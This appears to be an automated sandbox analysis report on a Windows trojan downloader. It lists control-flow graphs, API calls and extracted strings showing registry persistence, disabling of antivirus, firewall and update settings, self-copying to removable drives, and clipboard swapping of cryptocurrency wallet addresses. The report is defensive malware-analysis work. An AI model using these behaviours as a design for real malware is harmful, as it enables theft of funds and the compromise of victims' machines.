6042->6047 6046 406bca 6043->6046 6045 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6049 406c66 wsprintfW 6045->6049 6050 406c7b wsprintfW 6045->6050 6046->6045 6048 406beb 6046->6048 6047->6042 6049->6050 6051 406650 51 API calls 6050->6051 6051->6048 6052 40d3b0 6058 4021b0 6052->6058 6055 40d3ef 6056 40d3d5 WaitForSingleObject 6062 401600 6056->6062 6059 4021cf 6058->6059 6060 4021bb 6058->6060 6059->6055 6059->6056 6060->6059 6083 402020 6060->6083 6063 401737 6062->6063 6064 40160d 6062->6064 6063->6055 6064->6063 6065 401619 EnterCriticalSection 6064->6065 6066 401630 6065->6066 6067 4016b5 LeaveCriticalSection SetEvent 6065->6067 6066->6067 6072 401641 InterlockedDecrement 6066->6072 6074 40165a InterlockedExchangeAdd 6066->6074 6081 4016a0 InterlockedDecrement 6066->6081 6068 4016d0 6067->6068 6069 4016e8 6067->6069 6070 4016d6 PostQueuedCompletionStatus 6068->6070 6071 40d780 11 API calls 6069->6071 6070->6069 6070->6070 6073 4016f3 6071->6073 6072->6066 6075 40d8c0 7 API calls 6073->6075 6074->6066 6076 40166d InterlockedIncrement 6074->6076 6077 4016fc CloseHandle CloseHandle WSACloseEvent 6075->6077 6078 401c50 4 API calls 6076->6078 6104 40aff0 shutdown closesocket 6077->6104 6078->6066 6080 401724 DeleteCriticalSection 6082 40a660 _invalid_parameter 3 API calls 6080->6082 6081->6066 6082->6063 6084 40a240 7 API calls 6083->6084 6085 40202b 6084->6085 6086 402038 GetSystemInfo InitializeCriticalSection CreateEventA 6085->6086 6087 4021a5 6085->6087 6088 402076 CreateIoCompletionPort 6086->6088 6089 40219f 6086->6089 6087->6059 6088->6089 6090 40208f 6088->6090 6091 401600 36 API calls 6089->6091 6092 40d5e0 8 API calls 6090->6092 6091->6087 6093 402094 6092->6093 6093->6089 6094 40209f WSASocketA 6093->6094 6094->6089 6095 4020bd setsockopt htons bind 6094->6095 6095->6089 6096 402126 listen 6095->6096 6096->6089 6097 40213a WSACreateEvent 6096->6097 6097->6089 6098 402147 WSAEventSelect 6097->6098 6098->6089 6099 402159 6098->6099 6100 40217f 6099->6100 6101 40d610 17 API calls 6099->6101 6102 40d610 17 API calls 6100->6102 6101->6099 6103 402194 6102->6103 6103->6059 6104->6080 5715 4074f1 ExitThread 5716 407ff9 5717 408002 5716->5717 5718 408011 34 API calls 5717->5718 5719 408e46 5717->5719 6117 40a73e 6118 40a660 _invalid_parameter 3 API calls 6117->6118 6121 40a6fd 6118->6121 6119 40a712 6120 40a450 __aligned_recalloc_base 7 API calls 6120->6121 6121->6119 6121->6120 6122 40a714 memcpy 6121->6122 6122->6121

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 89 40ebe0-40ec0c GetLocaleInfoA strcmp 90 40ec12 89->90 91 40ec0e-40ec10 89->91 92 40ec14-40ec17 90->92 91->92
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ebe0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 14 4075f0-4075f2 ExitProcess 3->14 15 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407902-407922 RegOpenKeyExW 4->5 6 4078d6-4078fc RegSetValueExA RegCloseKey 4->6 8 407924-407950 RegSetValueExA RegCloseKey 5->8 9 407955-407975 RegOpenKeyExW 5->9 6->5 11 4079fa-407a1a RegOpenKeyExW 8->11 12 407977-4079a6 RegCreateKeyExW RegCloseKey 9->12 13 4079ac-4079cc RegOpenKeyExW 9->13 17 407a1c-407a48 RegSetValueExA RegCloseKey 11->17 18 407a4d-407a6d RegOpenKeyExW 11->18 12->13 13->11 16 4079ce-4079f4 RegSetValueExA RegCloseKey 13->16 19 40764c-40767b SetFileAttributesW RegOpenKeyExW 15->19 20 4076de-407720 Sleep wsprintfW CopyFileW 15->20 16->11 23 407b49-407b69 RegOpenKeyExW 17->23 24 407aa4-407ac4 RegOpenKeyExW 18->24 25 407a6f-407a9e RegCreateKeyExW RegCloseKey 18->25 19->20 26 40767d-4076b0 wcslen RegSetValueExW 19->26 21 407726-407755 SetFileAttributesW RegOpenKeyExW 20->21 22 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 20->22 21->22 29 407757-40778a wcslen RegSetValueExW 21->29 22->4 30 407817-407846 SetFileAttributesW RegOpenKeyExW 22->30 27 407b97-407bb7 RegOpenKeyExW 23->27 28 407b6b-407b91 RegSetValueExA RegCloseKey 23->28 31 407ac6-407af5 RegCreateKeyExW RegCloseKey 24->31 32 407afb-407b1b RegOpenKeyExW 24->32 25->24 26->20 33 4076b2-4076d4 RegCloseKey call 40ee30 26->33 34 407be5-407c05 RegOpenKeyExA 27->34 35 407bb9-407bdf RegSetValueExA RegCloseKey 27->35 28->27 29->22 36 40778c-4077ae RegCloseKey call 40ee30 29->36 30->4 37 407848-40787b wcslen RegSetValueExW 30->37 31->32 32->23 38 407b1d-407b43 RegSetValueExA RegCloseKey 32->38 33->20 45 4076d6-4076d8 ExitProcess 33->45 40 407cf1-407d11 RegOpenKeyExA 34->40 41 407c0b-407ceb RegSetValueExA * 7 RegCloseKey 34->41 35->34 36->22 50 4077b0-4077b2 ExitProcess 36->50 37->4 43 40787d-40789f RegCloseKey call 40ee30 37->43 38->23 46 407d17-407df7 RegSetValueExA * 7 RegCloseKey 40->46 47 407dfd-407e12 Sleep call 40cc80 40->47 41->40 43->4 54 4078a1-4078a3 ExitProcess 43->54 46->47 55 407f87-407f90 47->55 56 407e18-407f84 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40daf0 call 406f70 CreateEventA call 40c3b0 call 40d5e0 call 40b770 call 40d610 * 4 call 40d780 call 40d8c0 47->56 56->55
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNELBASE(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-745901262
                                                                                • Opcode ID: 5d2210e2075790dfbba300687ee5d24c3552d18a1fa068fed954528d406d25e8
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: 5d2210e2075790dfbba300687ee5d24c3552d18a1fa068fed954528d406d25e8
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 83 40ee30-40ee90 memset * 2 CreateProcessW 84 40eea1-40eec5 ShellExecuteW 83->84 85 40ee92-40ee9f Sleep 83->85 87 40eed6 84->87 88 40eec7-40eed4 Sleep 84->88 86 40eed8-40eedb 85->86 87->86 88->86
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNELBASE(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNELBASE(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 93 406650-406665 _chkstk 94 406667-406669 93->94 95 40666e-406720 wsprintfW * 5 PathFileExistsW 93->95 96 406b48-406b4b 94->96 97 406722-406743 call 40ec20 95->97 98 406764-406773 PathFileExistsW 95->98 97->98 107 406745-40675e SetFileAttributesW DeleteFileW 97->107 99 406803-406812 PathFileExistsW 98->99 100 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 98->100 104 406814-40681a 99->104 105 406859-40687a FindFirstFileW 99->105 102 4067a9-4067ba CreateDirectoryW 100->102 103 4067cb-4067da PathFileExistsW 100->103 102->103 110 4067bc-4067c5 SetFileAttributesW 102->110 103->99 111 4067dc-4067f2 CopyFileW 103->111 112 406834-406847 call 406400 104->112 113 40681c-406832 call 406400 104->113 108 406880-406938 105->108 109 406b42 105->109 107->98 114 406942-406956 lstrcmpW 108->114 109->96 110->103 111->99 115 4067f4-4067fd SetFileAttributesW 111->115 122 40684a-406853 SetFileAttributesW 112->122 113->122 118 406958-40696c lstrcmpW 114->118 119 40696e 114->119 115->99 118->119 123 406973-406984 118->123 124 406b19-406b2f FindNextFileW 119->124 122->105 125 406995-40699c 123->125 124->114 126 406b35-406b3c FindClose 124->126 127 4069ca-4069d3 125->127 128 40699e-4069bb lstrcmpiW 125->128 126->109 131 4069d5 127->131 132 4069da-4069eb 127->132 129 4069bd 128->129 130 4069bf-4069c6 128->130 129->125 130->127 131->124 134 4069fc-406a03 132->134 135 406a73-406a7c 134->135 136 406a05-406a22 PathMatchSpecW 134->136 139 406a83-406a92 PathFileExistsW 135->139 140 406a7e 135->140 137 406a24 136->137 138 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 136->138 137->134 138->135 142 406a94 139->142 143 406a99-406ae9 wsprintfW * 2 139->143 140->124 142->124 144 406b03-406b13 MoveFileExW 143->144 145 406aeb-406b01 call 406510 143->145 144->124 145->124
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(0041A428,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-3454820331
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(00000000), ref: 004048BC
                                                                                • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404C72
                                                                                • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404C9D
                                                                                • StrStrW.SHLWAPI(00000000,addr), ref: 00404CC8
                                                                                • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D67
                                                                                • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404D7E
                                                                                • StrStrW.SHLWAPI(00000000,nano_), ref: 00404D95
                                                                                • isalpha.NTDLL ref: 00404E14
                                                                                • isdigit.NTDLL ref: 00404E2B
                                                                                • StrStrW.SHLWAPI(00000000,bnb), ref: 0040530C
                                                                                • StrStrW.SHLWAPI(00000000,band), ref: 00405326
                                                                                • StrStrW.SHLWAPI(00000000,bc1), ref: 00405340
                                                                                • StrStrW.SHLWAPI(00000000,ronin:), ref: 0040535A
                                                                                • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405374
                                                                                • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040538E
                                                                                • StrStrW.SHLWAPI(00000000,addr), ref: 004053A8
                                                                                • StrStrW.SHLWAPI(00000000,nano_), ref: 004053C2
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405483
                                                                                • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040549E
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004054B1
                                                                                • memcpy.NTDLL(00000000,00000000,-00000001), ref: 004054CF
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004054DB
                                                                                • OpenClipboard.USER32(00000000), ref: 004054E3
                                                                                • EmptyClipboard.USER32 ref: 004054ED
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 004054F9
                                                                                • CloseClipboard.USER32 ref: 004054FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                                • String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                                • API String ID: 2780752356-1454159098
                                                                                • Opcode ID: db0cde2cd50ccb5069a51a9c4317994cb8735621270c1e5570870890d393e6db
                                                                                • Instruction ID: 26410022a6445c47d5157de28e84b6b5fde917cb10c9abdd84e28c21981b130d
                                                                                • Opcode Fuzzy Hash: db0cde2cd50ccb5069a51a9c4317994cb8735621270c1e5570870890d393e6db
                                                                                • Instruction Fuzzy Hash: 0E8239B0A00218EACF548F41C0945BE7BB2EF82751F60C06BE9456F294D77D9ED1DB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID: Y
                                                                                • API String ID: 673498613-3233089245
                                                                                • Opcode ID: e0219c0cb63c951aee207acb5c20a8eba96760fb7fce38bb851f4f92132f37b8
                                                                                • Instruction ID: 91a0cfa4af347c69fbb9c53c66948b689c70d87f72a9d4407fdf19585fed71d9
                                                                                • Opcode Fuzzy Hash: e0219c0cb63c951aee207acb5c20a8eba96760fb7fce38bb851f4f92132f37b8
                                                                                • Instruction Fuzzy Hash: 30D22979D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630BA95DF80

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: c852d1659e7a65a571c4b59e3ddf7e14438d3a7a61dc4406c53c3f8d29bf0a61
                                                                                • Instruction ID: ca30ecb1613d8b6096c3d6248fe69ff98c04f7b8c63c1f977ddd3c5f0a8ac617
                                                                                • Opcode Fuzzy Hash: c852d1659e7a65a571c4b59e3ddf7e14438d3a7a61dc4406c53c3f8d29bf0a61
                                                                                • Instruction Fuzzy Hash: EDD22979D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630BA95DF80

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 623 405910-405932 GetWindowLongW 624 405934-40593b 623->624 625 405956-40595d 623->625 626 405941-405945 624->626 627 4059c7-4059d8 IsClipboardFormatAvailable 624->627 628 405986-40598c 625->628 629 40595f 625->629 634 405964-405981 SetClipboardViewer SetWindowLongW 626->634 635 405947-40594b 626->635 632 4059e3-4059ed IsClipboardFormatAvailable 627->632 633 4059da-4059e1 627->633 630 4059a6-4059aa 628->630 631 40598e-4059a4 SetWindowLongW 628->631 636 405b44-405b5d DefWindowProcA 629->636 637 4059c2 630->637 638 4059ac-4059bc SendMessageA 630->638 631->637 640 4059f8-405a02 IsClipboardFormatAvailable 632->640 641 4059ef-4059f6 632->641 639 405a0b-405a0f 633->639 634->636 642 405951 635->642 643 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 635->643 637->636 638->637 645 405a15-405a1f OpenClipboard 639->645 646 405adf-405ae3 639->646 640->639 644 405a04 640->644 641->639 642->636 643->636 644->639 645->646 649 405a25-405a36 GetClipboardData 645->649 647 405ae5-405af5 SendMessageA 646->647 648 405afb 646->648 647->648 648->636 650 405a38 649->650 651 405a3d-405a4e GlobalLock 649->651 650->636 652 405a50 651->652 653 405a55-405a66 651->653 652->636 654 405a68-405a6c 653->654 655 405a89-405a9c call 405630 653->655 656 405a9e-405aae call 405750 654->656 657 405a6e-405a72 654->657 663 405ab1-405ac5 GlobalUnlock CloseClipboard 655->663 656->663 659 405a74 657->659 660 405a76-405a87 call 405510 657->660 659->663 660->663 663->646 667 405ac7-405adc call 4048a0 call 40a660 663->667 667->646
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 698 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 699 406565-406579 lstrcmpW 698->699 700 40663f-406642 698->700 701 406591 699->701 702 40657b-40658f lstrcmpW 699->702 704 40660c-406622 FindNextFileW 701->704 702->701 703 406593-4065dc wsprintfW * 2 702->703 705 4065f6-406606 MoveFileExW 703->705 706 4065de-4065f4 call 406510 703->706 704->699 707 406628-406639 FindClose RemoveDirectoryW 704->707 705->704 706->704 707->700
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
